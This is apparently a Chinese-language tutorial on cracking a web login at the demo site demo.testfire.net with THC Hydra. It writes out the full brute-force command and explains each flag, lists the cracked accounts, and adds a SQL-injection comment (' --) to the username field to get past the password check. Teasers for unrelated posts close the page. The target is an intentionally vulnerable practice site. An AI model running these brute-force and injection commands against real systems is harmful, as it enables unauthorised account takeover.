使用浏览器查找该网页原始码
先找form > 帐号栏位为uid > 密码栏位为passw > 使用post传给doLogin
破解
cd C:\Users\user\Downloads\thc-hydra-windows-v8.5
移到hydra目录下
hydra -L user.lst -P password.lst demo.testfire.net http-post-form "/doLogin:uid=^USER^&passw=^PASS^&btnSubmit=Login:Login Failed:C=/login.jsp"
-L > 指定帐号字典档
-l > 指定一个帐号
-P > 指定密码字典档
-p > 指定一个密码
http-post-form > 服务模组
/doLogin > 验证网址
: > 分隔
uid=^USER^&passw=^PASS^&btnSubmit=Login > 要传送给验证网址的资料
Login Failed > 判断准则
C=/login.jsp > 指定在传送资料前,先向网址取得Cookie资讯
login:admin password:admin
> 破解的第一组帐号密码
login:jsmith password:demo1234
> 破解的第二组帐号密码
密码固定,破解帐号
hydra -L user.lst -p 1234 demo.testfire.net http-post-form "/doLogin:uid=^USER^' --&passw=1234:Login Failed:C=/login.jsp"
固定密码为1234 > 破解帐号
login:admin password:1234
> 破解的第一组帐号
login:jsmith password:1234
> 破解的第二组帐号
环境 VS2013 ASP.NET 4.0 GridView怎麽做删除钮与编辑钮. 要做之前,我们要...
天亮了 昨晚是平安夜 关於迷雾森林故事 焦虑抑制剂 10号:哈罗大家好,我是海马诚实小君,其实原本一...
前言 今天先暂停一下sum的题目,来做top 100 liked的另外一题─287. Find th...
前言 昨天知道了怎麽使用 SELECT 和 WHERE 之後,就要来实际做做看啦 (先附上整段程序码...
二、ISO 27005 架构 ISO 27005资讯安全风险管理架构如下图: 先说明建立全景的步骤:...